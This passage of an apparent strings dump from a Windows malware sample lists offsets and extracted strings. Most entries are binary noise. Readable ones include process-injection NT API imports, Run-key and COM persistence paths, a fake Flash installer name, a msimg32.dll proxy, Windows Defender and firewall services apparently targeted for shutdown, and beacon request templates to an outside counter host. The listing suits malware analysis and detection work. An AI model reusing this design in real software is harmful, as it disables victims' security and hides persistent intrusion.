  804. 0x000840 ZwWriteVirtualMemory
  805. 0x000856 AQAPRQH
  806. 0x00085F (YZAXAY
  807. 0x000868 ZwQuerySystemInformation
  808. 0x000882 AQAPRQH
  809. 0x00088B (YZAXAY
  810. 0x000894 ZwQueryInformationThread
  811. 0x0008AE AQAPRQH
  812. 0x0008B7 (YZAXAY
  813. 0x0008C0 ZwOpenProcess
  814. 0x0008CF AQAPRQH
  815. 0x0008D8 (YZAXAY
  816. 0x0008E1 ZwOpenThread
  817. 0x0008EF AQAPRQH
  818. 0x0008F8 (YZAXAY
  819. 0x000901 ZwQueueApcThread
  820. 0x000913 AQAPRQH
  821. 0x00091C (YZAXAY
  822. 0x000925 ZwClose
  823. 0x00092E AQAPRQH
  824. 0x000937 (YZAXAY
  825. 0x000940 RtlEqualUnicodeString
  826. 0x000957 AQAPRQH
  827. 0x000960 (YZAXAY
  828. 0x000969 RtlInitUnicodeString
  829. 0x00097F AQAPRQH
  830. 0x000988 (YZAXAY
  831. 0x000991 ZwFreeVirtualMemory
  832. 0x0009A6 x ATAUAVH
  833. 0x0009B7 T$HE3
  834. 0x0009DD p WATAUAVAWH
  835. 0x0009F7 D$PA+
  836. 0x000A18 A]A\_
  837. 0x000A25 IcC<B
  838. 0x000A41 5MSCF
  839. 0x000A48 EB7F
  840. 0x000A4F fp.exe
  841. 0x000A57 wU;\:P
  842. 0x000A64 Kz'@r
  843. 0x000A70 a9%vV!
  844. 0x000A7E -puHO
  845. 0x000A85 !iA|x
  846. 0x000AB1 OZ(1w
  847. 0x000AC8 VK[5,Iz
  848. 0x000AFD Y9Jja
  849. 0x000B19 8AFg'"LE
  850. 0x000B2E q4UDq
  851. 0x000B35 GL OgB
  852. 0x000B43 FE1EE
  853. 0x000B67 HtQI=
  854. 0x000B84 NtUAV[v
  855. 0x000B95 LhNkh$Q
  856. 0x000BA3 fXbok
  857. 0x000BBA RyZ,{,0&{
  858. 0x000BC5 'Hk;Q
  859. 0x000BFB g~p=r
  860. 0x000C1D rQem4$
  861. 0x000C52 :TOzm
  862. 0x000C59 {jbA&f
  863. 0x000C70 rk8\~W
  864. 0x000C82 r61Dl.
  865. 0x000CA0 FD<@L3
  866. 0x000CB8 #K}jT
  867. 0x000CF2 f3mhn
  868. 0x000D14 W+<I|o
  869. 0x000D22 w7|Bt
  870. 0x000D2E F3in#
  871. 0x000D3A wq;j;f;
  872. 0x000D43 aVtGyZ[b
  873. 0x000D53 t)QFS[
  874. 0x000D60 ;Z7l3
  875. 0x000D78 &kzos
  876. 0x000D94 >;~vDe
  877. 0x000DA1 Qa3;v
  878. 0x000DAE 0eQTE
  879. 0x000DC1 G=[KE
  880. 0x000DCE 9NNx{6
  881. 0x000E3F 8YvV{J
  882. 0x000E47 B\eIS:a
  883. 0x000E76 +ruZ5
  884. 0x000E7D ht*&x
  885. 0x000E8F Oy)D7
  886. 0x000E9B 4M&eKD
  887. 0x000EA8 x_zDN
  888. 0x000EC0 v6FMkBT
  889. 0x000EC9 |y#nwC2
  890. 0x000ED7 b"'Wj
  891. 0x000F00 PEUU/r
  892. 0x000F08 l/xb"
  893. 0x000F1B ag&(g
  894. 0x000F22 F*JQT%
  895. 0x000F2A fCJ+U
  896. 0x000F4E t-cBT
  897. 0x000F72 jD0dPp
  898. 0x000F99 Y*9x8 d
  899. 0x000FA8 O7 > a.dc]W
  900. 0x000FE1 KnX6?
  901. 0x000FFD D's.P
  902. 0x001027 0tEB2Y
  903. 0x001039 F;Ans
  904. 0x00104B $X&sg
  905. 0x001052 rFcNC
  906. 0x001059 Q+nal
  907. 0x001076 J*BpCL
  908. 0x00107E "E~PxA
  909. 0x001091 gSh>H
  910. 0x001098 @Fx7d
  911. 0x00109F b}""QA
  912. 0x0010A7 :3;10wCY
  913. 0x0010B6 /Zv7Ye
  914. 0x0010BE 2BoDX
  915. 0x0010C5 at /7xO
  916. 0x0010E7 <o*+wI
  917. 0x0010F4 c@ufbc=c
  918. 0x00110E fV3:O{
  919. 0x001116 ma1 lB
  920. 0x001151 71cTK
  921. 0x001158 aw}!4O{+$
  922. 0x00116E ra. M
  923. 0x001185 r$@}Ad
  924. 0x00118D 44b=iBe:iFK
  925. 0x00119A gK-N/:
  926. 0x0011AC |>RxX\
  927. 0x0011BA 6pcg'
  928. 0x0011E3 .!E1hDFr
  929. 0x0011ED NnPbz<
  930. 0x0011F5 yyJX)
  931. 0x001211 &d_ad
  932. 0x001218 .]Qbd7
  933. 0x00122F fj<tT
  934. 0x001241 ZZ fa
  935. 0x001248 Z]8FhP
  936. 0x001260 <vZ;v
  937. 0x001271 MZh&{
  938. 0x00128C ZsAv]9
  939. 0x00129A ]]UyU
  940. 0x0012A7 9uS:O
  941. 0x0012CE w&V!m]bO
  942. 0x0012E3 Q&erb
  943. 0x00132A l\systemroot
  944. 0x001338 \BaseNamedObjects\{81D05F9A-5343-439f-ACAB-E7822E4416F9}
  945. 0x001372 A\??\ACPI#PNP0303#2&da1a3ff&0
  946. 0x001391 \BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77}
  947. 0x0013D6 A\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78}
  948. 0x00141C AMicrosoft Base Cryptographic Provider v1.0
  949. 0x001449 \BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1}
  950. 0x00148E 2RECYCLER\
  951. 0x00149A $Recycle.Bin\
  952. 0x0014A9 \$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x
  953. 0x0014D9 A%wZ\Software\Classes\clsid
  954. 0x0014F6 InprocServer32
  955. 0x001506 {fbeb8a05-beee-4442-804e-409d6c4515e9}
  956. 0x00152E AThreadingModel
  957. 0x00153F ABoth
  958. 0x001546 \registry\machine\Software\Classes\clsid\{5839fca9-774d-42a1-acda-d6a79037f57f}\InprocServer32
  959. 0x0015A6 explorer.exe
  960. 0x0015B4 services.exe
  961. 0x0015C8 TEMP=
  962. 0x0015CF \InstallFlashPlayer.exe
  963. 0x0015E8 \msimg32.dll
  964. 0x0015F6 \registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  965. 0x001637 AWindows Defender
  966. 0x00164A Awscntfy.exe
  967. 0x001658 AMSASCui.exe
  968. 0x001666 AMpCmdRun.exe
  969. 0x001675 ANisSrv.exe
  970. 0x001682 Amsseces.exe
  971. 0x001690 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}
  972. 0x001712 A\registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}
  973. 0x001794 AMsMpSvc
  974. 0x00179E windefend
  975. 0x0017A9 SharedAccess
  976. 0x0017B7 iphlpsvc
  977. 0x0017C1 wscsvc
  978. 0x0017C9 mpssvc
  979. 0x0017DC ATEMP=
  980. 0x0017E4 Arunas
  981. 0x0017EC @comspec=
  982. 0x001807 cfWk5
  983. 0x001829 ?[NGW+
  984. 0x00183A ~yuD8\
  985. 0x001848 t*T5B
  986. 0x00184F *VNyE
  987. 0x001860 MjC'9J+
  988. 0x001874 lJYLvF
  989. 0x001888 f;k5V
  990. 0x0018B3 ,v:Vw
  991. 0x0018C6 ve]PLo
  992. 0x0018F6 ~X[tY#
  993. 0x001903 Sv-e:#g:v
  994. 0x00191D XrEZ_
  995. 0x001933 z(ILj
  996. 0x001955 1}UQcJ
  997. 0x00195D 7lZlQQ
  998. 0x001965 ;TifK
  999. 0x001971 bY6#i
  1000. 0x00198D rjW'~
  1001. 0x00199E Kfb#HW
  1002. 0x0019B0 i>?hz
  1003. 0x0019C3 m _Nv0
  1004. 0x0019CB 7uAUh
  1005. 0x0019D2 PoQL,
  1006. 0x0019D9 uNKzl
  1007. 0x0019E0 d0|:Tw
  1008. 0x0019ED [l2og
  1009. 0x0019F4 Fu.z0QN
  1010. 0x001A47 gY4[nLs
  1011. 0x001A56 MhErw;:]
  1012. 0x001A75 [N2gQ
  1013. 0x001AB8 :s2oV
  1014. 0x001AC4 dQU%m
  1015. 0x001AD1 (L$Zj-l
  1016. 0x001AF1 4M=h X_+Z
  1017. 0x001B53 ?gOwN
  1018. 0x001B7B ljMZJ
  1019. 0x001B82 |X,$yFF
  1020. 0x001B96 8rLb#
  1021. 0x001B9D c)g!}T9
  1022. 0x001BAB [vHL<
  1023. 0x001BD8 VCWGl
  1024. 0x001BF1 kD~S&
  1025. 0x001BF8 !h0dHR
  1026. 0x001C18 P|4GV
  1027. 0x001C2F -w/I#JM
  1028. 0x001C3E =O|nM
  1029. 0x001C4A $lDa0+
  1030. 0x001C5D ;TAP2!
  1031. 0x001C71 $)4u0rp
  1032. 0x001C7A *KA3Ax
  1033. 0x001C91 ;TmAW
  1034. 0x001C9E ~G%as
  1035. 0x001CB1 kh'Z?
  1036. 0x001CBE 9W~wi]
  1037. 0x001CE1 B|.NYSt
  1038. 0x001CEA 9si\hd
  1039. 0x001D07 6Pz?LL
  1040. 0x001D1B >{"UQE
  1041. 0x001D25 ?UR"u
  1042. 0x001D2C uFM =~<
  1043. 0x001D40 R-r-F
  1044. 0x001D58 O|ix7
  1045. 0x001D64 <8x\O s
  1046. 0x001D72 &M@Vt
  1047. 0x001D8F Z :py
  1048. 0x001D96 !,VSQ1_
  1049. 0x001D9F rSYbA
  1050. 0x001DAC 8IEzB
  1051. 0x001DBE XK~Ox
  1052. 0x001DC5 d@=Bz
  1053. 0x001DCC mPexxN
  1054. 0x001DE9 L3ECB
  1055. 0x001DFD 7jx;{V
  1056. 0x001E25 c8Bol
  1057. 0x001E58 yoh(,-1
  1058. 0x001E67 t|#IP
  1059. 0x001E79 QGKPf
  1060. 0x001EA6 Fbj-8
  1061. 0x001EAD l{f|RD
  1062. 0x001EC4 >w\j+E
  1063. 0x001ECC RqKg\~
  1064. 0x001ED4 SLJ:rL8
  1065. 0x001EE2 O|DMH
  1066. 0x001EE9 w{k{t{
  1067. 0x001F07 n<c"R
  1068. 0x001F1F [MH:i
  1069. 0x001F2C Z<r:J
  1070. 0x001F33 p0Za'
  1071. 0x001F40 MqMJnMO
  1072. 0x001F50 o-R[K
  1073. 0x001F73 +vP'nUX
  1074. 0x001F7C m/kS_
  1075. 0x001F94 0vWcu>g
  1076. 0x001FA2 _@B*gW
  1077. 0x001FC1 /FLgwn
  1078. 0x001FD5 cOo)}
  1079. 0x001FDC s58Yz
  1080. 0x001FE3 )BB=Jx
  1081. 0x001FF1 ..rWF8
  1082. 0x002009 \qAJt*
  1083. 0x002028 Wh\{kD
  1084. 0x002042 I[gCgH
  1085. 0x002059 xk;#\=S0
  1086. 0x002073 bNIo)08\
  1087. 0x002082 K<<cw
  1088. 0x0020A4 AWb<P'
  1089. 0x0020FD t(FuJI
  1090. 0x002112 nK*i:
  1091. 0x00211E qPy-q
  1092. 0x00212B MER/%
  1093. 0x002138 |Po?Vp
  1094. 0x002146 HY0{sP
  1095. 0x00216C WZ}y'P
  1096. 0x002174 X74KS
  1097. 0x002186 o9beNs
  1098. 0x00218E x2A:qA$
  1099. 0x002197 dtllh
  1100. 0x0021B9 d*D+H
  1101. 0x0021CB ]yyyal
  1102. 0x0021DD kuNi<
  1103. 0x0021F4 -E,\_RS0
  1104. 0x00220F a/.kvw
  1105. 0x002246 j\0;wO
  1106. 0x002259 Judn#
  1107. 0x002260 JmmBAe
  1108. 0x00226D MG<u~
  1109. 0x00228B vJ-/xLQ2
  1110. 0x0022A5 7ZHS3
  1111. 0x0022B1 uh#Sib
  1112. 0x0022BF SHELL32.dll
  1113. 0x0022CC fp.exe
  1114. 0x0022D4 GET /5699017-3C912481A04E584CDF231C519E1DF857/counter.img?theme=%u&digits=10&siteId=%u HTTP/1.1
  1115. 0x002335 Host: bigfatcounters.com
  1116. 0x00234F User-Agent: Opera/9 (Windows NT %u.%u; %s; %s)
  1117. 0x00237F Connection: close
  1118. 0x002392 GET /app/geoip.js HTTP/1.0
  1119. 0x0023AE Host: j.maxmind.com
  1120. 0x0023C3 Connection: close
  1121. 0x0023D6 geoip_country_code
  1122. 0x0023EA j.maxmind.com
  1123. 0x0023F9 ShellExecuteExW
  1124. 0x00240A memcpy
  1125. 0x002412 ZwOpenFile
  1126. 0x00241E ZwQueryVolumeInformationFile
  1127. 0x00243C ZwClose
  1128. 0x002445 ZwOpenEvent
  1129. 0x002452 swprintf
  1130. 0x00245C RtlInitUnicodeString
  1131. 0x002472 RtlAdjustPrivilege
  1132. 0x002486 ZwOpenProcessToken
  1133. 0x00249A ZwQueryInformationToken
  1134. 0x0024B3 ZwQueryInformationProcess
  1135. 0x0024CE RtlRandomEx
  1136. 0x0024DB ZwCreateEvent
  1137. 0x0024EA ZwDelayExecution
  1138. 0x0024FC ZwOpenThread
  1139. 0x00250A ZwImpersonateThread
  1140. 0x00251F ZwOpenThreadTokenEx
  1141. 0x002534 ZwAdjustPrivilegesToken
  1142. 0x00254D ZwQuerySystemInformation
  1143. 0x002567 ZwWaitForSingleObject
  1144. 0x00257E ZwAlertThread
  1145. 0x00258D LdrFindEntryForAddress
  1146. 0x0025A5 RtlDosPathNameToNtPathName_U
  1147. 0x0025C3 ZwQueryEaFile
  1148. 0x0025D2 RtlFreeUnicodeString
  1149. 0x0025E8 ZwCreateFile
  1150. 0x0025F6 RtlTimeToSecondsSince1980
  1151. 0x002611 ZwWriteFile
  1152. 0x00261E RtlAppendUnicodeToString
  1153. 0x002638 RtlConvertSidToUnicodeString
  1154. 0x002656 RtlFormatCurrentUserKeyPath
  1155. 0x002673 ZwCreateKey
  1156. 0x002680 ZwSetValueKey
  1157. 0x00268F wcslen
  1158. 0x002697 ZwOpenKey
  1159. 0x0026A2 ZwSetSecurityObject
  1160. 0x0026B7 memset
  1161. 0x0026BF wcscat
  1162. 0x0026C7 sprintf
  1163. 0x0026D0 RtlComputeCrc32
  1164. 0x0026E1 ZwDuplicateObject
  1165. 0x0026F4 ZwDeleteKey
  1166. 0x002701 ZwDeleteValueKey
  1167. 0x002713 RtlEqualUnicodeString
  1168. 0x00272A ZwOpenProcess
  1169. 0x002739 ZwTerminateProcess
  1170. 0x00274D ZwSuspendThread
  1171. 0x00275E RtlGetCurrentPeb
  1172. 0x002770 RtlPrefixUnicodeString
  1173. 0x002788 wcscpy
  1174. 0x002790 ZwQueryInformationFile
  1175. 0x0027A8 ZwCreateSection
  1176. 0x0027B9 ZwMapViewOfSection
  1177. 0x0027CD ZwUnmapViewOfSection
  1178. 0x0027E3 strcmp
  1179. 0x0027EB RtlIpv4StringToAddressA
  1180. 0x002804 ZwGetContextThread
  1181. 0x002818 ZwSetInformationFile
  1182. 0x00282E RtlExitUserThread
  1183. 0x002841 ZwWriteVirtualMemory
  1184. 0x002857 ZwSetContextThread
  1185. 0x00286B ZwTerminateThread
  1186. 0x00287E ZwResumeThread
  1187. 0x00288E RtlInterlockedPushEntrySList
  1188. 0x0028AC RtlInterlockedPopEntrySList
  1189. 0x0028C9 RtlNtStatusToDosError
  1190. 0x0028E0 ntdll.dll
  1191. 0x0028EB GetVersion
  1192. 0x0028F7 GetTickCount
  1193. 0x002905 ExitProcess
  1194. 0x002912 LocalAlloc
  1195. 0x00291E LocalFree
  1196. 0x002929 VirtualProtect
  1197. 0x002939 Sleep
  1198. 0x002940 ExitThread
  1199. 0x00294C DisableThreadLibraryCalls
  1200. 0x002967 CreateThread
  1201. 0x002975 GetSystemTimeAsFileTime
  1202. 0x00298E GetLastError
  1203. 0x00299C CreateProcessW
  1204. 0x0029AC BindIoCompletionCallback
  1205. 0x0029C6 DeleteTimerQueueTimer
  1206. 0x0029DD CreateTimerQueueTimer
  1207. 0x0029F4 KERNEL32.dll
  1208. 0x002A02 MD5Init
  1209. 0x002A0B MD5Update
  1210. 0x002A16 MD5Final
  1211. 0x002A20 CryptAcquireContextW
  1212. 0x002A36 CryptGenRandom
  1213. 0x002A46 CryptReleaseContext
  1214. 0x002A5B OpenServiceW
  1215. 0x002A69 ControlService
  1216. 0x002A79 ChangeServiceConfigW
  1217. 0x002A8F DeleteService
  1218. 0x002A9E CloseServiceHandle
  1219. 0x002AB2 OpenSCManagerW
  1220. 0x002AC2 ADVAPI32.dll
  1221. 0x002AD0 Cabinet.dll
  1222. 0x002ADD WSASocketW
  1223. 0x002AE9 WSAIoctl
  1224. 0x002AF3 WSARecv
  1225. 0x002AFC WSASend
  1226. 0x002B05 WSASendTo
  1227. 0x002B10 WSARecvFrom
  1228. 0x002B1D WS2_32.dll
  1229. 0x002B29 GetProcAddress
  1230. 0x002B39 FreeLibrary
  1231. 0x002B46 InterlockedExchange
  1232. 0x002B5B LoadLibraryA
  1233. 0x002B69 RaiseException
  1234. 0x002B79 uncrypted.exe
  1235. 0x002B88 AlphaBlend
  1236. 0x002B94 system32\msimg32.AlphaBlend
  1237. 0x002BB1 GradientFill
  1238. 0x002BBF system32\msimg32.GradientFill
  1239. 0x002BDE TransparentBlt
  1240. 0x002BEE system32\msimg32.TransparentBlt
  1241. 0x002C1F 1+1>1D1K1Q1Z1a1
  1242. 0x002C30 3 393?3F3L3_3m3s3
  1243. 0x002C43 <'</<:<B<I<o<
  1244. 0x002C52 >(>->@>F>O>s>
  1245. 0x002C61 0E0\0l0y0
  1246. 0x002C6C 5'5.555B5L5Y5f5s5
  1247. 0x002C7F 6(686B6L6[6d6m6v6
  1248. 0x002C92 7&7?7Y7h7p7u7
  1249. 0x002CA1 8.878<8A8H8M8R8
  1250. 0x002CB6 3R3Y3
  1251. 0x002CBC 3f3n3
  1252. 0x002CC3 4$4/454;4H4Q4[4h4
  1253. 0x002CD6 7)7=7J7Q7Z7_7
  1254. 0x002CE5 3$484L4P4T4X4\4
  1255. 0x002D04 Wi|LE
  1256. 0x002D1A _(wRz
  1257. 0x002D27 OP*IZV_
  1258. 0x002D35 pTsBL
  1259. 0x002D51 =_cSZ
  1260. 0x002D58 _cuMIr
  1261. 0x002D6A k<6:Pb+
  1262. 0x002D79 fI&rS
  1263. 0x002D8F \(B]X
  1264. 0x002DA2 0UgaX
  1265. 0x002DA9 p{bjE
  1266. 0x002DB6 rGS(#L
  1267. 0x002DD8 d7OtX
  1268. 0x002DE4 =awS/c
  1269. 0x002E13 q*CD{
  1270. 0x002E1A (n.Pf
  1271. 0x002E27 3o-eHx
  1272. 0x002E35 sW1,I
  1273. 0x002E41 <Ul%M3RMF
  1274. 0x002E68 M4g(+m
  1275. 0x002E70 cpO=m
  1276. 0x002E7D Lk@]kl}
  1277. 0x002E8B V6H)rU
  1278. 0x002E9E $dm,y
  1279. 0x002EBA {YscG
  1280. 0x002ECB !_cDh\
  1281. 0x002ED8 Y'*OY
  1282. 0x002EFF Bp A.3P1o
  1283. 0x002F1A 4nC<n
  1284. 0x002F49 pwz;YB
  1285. 0x002F51 rz?DXs
  1286. 0x002F59 A<atY
  1287. 0x002F72 ww=rJ]
  1288. 0x002F7A V}qJY
  1289. 0x002F9D 2z(u*vr
  1290. 0x002FAC kq{Al
  1291. 0x002FB8 !8CFQ
  1292. 0x002FCA +P5Yu
  1293. 0x002FE8 TrK>Z
  1294. 0x002FFA dm0\e
  1295. 0x003030 Tv|E[
  1296. 0x003042 HVL_:g
  1297. 0x003088 'RpY~B S
  1298. 0x00309C pwTP<
  1299. 0x0030AD B"Jk!J
  1300. 0x0030B5 JTFkb
  1301. 0x0030C8 Ee\uV
  1302. 0x0030CF ,nmI7
  1303. 0x0030F4 1_kGCH&
  1304. 0x003112 Xv?'E c"
  1305. 0x00316B sboLr
  1306. 0x003172 %p[y/a
  1307. 0x003185 Oy~y.
  1308. 0x003192 I~S;~t
  1309. 0x00319A Us[ybr
  1310. 0x0031BF Cc*lB
  1311. 0x0031D9 ~_VvK
  1312. 0x0031E6 0TIiHUE}
  1313. 0x0031F0 xE(S|&
  1314. 0x003209 nJ!Vc
  1315. 0x003215 Z!3[wi
  1316. 0x003234 sr+A}
  1317. 0x00325B INY9Vh;W
  1318. 0x00326A NL8#F-
  1319. 0x00327D p"ZT+L
  1320. 0x003295 /BT=Z
  1321. 0x0032A1 [>G:oj5u
  1322. 0x0032AB WgXPHi
  1323. 0x0032D2 v}:PQ
  1324. 0x0032D9 N*YnM
  1325. 0x0032E6 ")dfo
  1326. 0x0032F2 U~EQ@
  1327. 0x0032F9 oTB)S
  1328. 0x003316 kbOv7'
  1329. 0x00333D jYA$Q
  1330. 0x003357 E8p|c;
  1331. 0x00336A YBbP:
  1332. 0x003371 STMZF
  1333. 0x003378 >XfaH
  1334. 0x00337F TpIF.
  1335. 0x003396 doFk;z
  1336. 0x00339E Ewh@cX
  1337. 0x0033AB 2oq(V
  1338. 0x0033CD .bAp]
  1339. 0x0033EE 8XBg+|#>
  1340. 0x0033FE v>}Bt
  1341. 0x00341C #PUj<
  1342. 0x003423 z0kZG
  1343. 0x00342F &GN\B
  1344. 0x003441 s=VIT
  1345. 0x003457 x:Ahz
  1346. 0x00349C [jQf%
  1347. 0x0034AD n"/HY
  1348. 0x0034BC [n])gf
  1349. 0x0034F0 ,GkTvO
  1350. 0x0034F8 JTdtU%
  1351. 0x003506 {W!!Fk
  1352. 0x003514 b$&msB
  1353. 0x003547 !F\DA
  1354. 0x00355A WH;M]
  1355. 0x003561 !8(<EbN9
  1356. 0x00356B jO<qi
  1357. 0x003578 ;NjhkUE
  1358. 0x00358B L#Kkx
  1359. 0x00359E =/Ej+nc
  1360. 0x0035B5 u[R1?f
  1361. 0x0035DE k@nfQ(
  1362. 0x0035F2 ;Spmh=T
  1363. 0x00360D virUe
  1364. 0x003628 @\xfQK
  1365. 0x003649 IbUgf
  1366. 0x00367F utz;s.
  1367. 0x0036A4 EDY/z
  1368. 0x0036AB xYG Va
  1369. 0x0036CA e.WXt
  1370. 0x0036E1 c2RjY
  1371. 0x0036E8 UDiFn
  1372. 0x0036F4 a,&GQ{
  1373. 0x003701 V#[.rU
  1374. 0x003713 gPKec
  1375. 0x00372A iCZt!
  1376. 0x003747 /s~2l?4T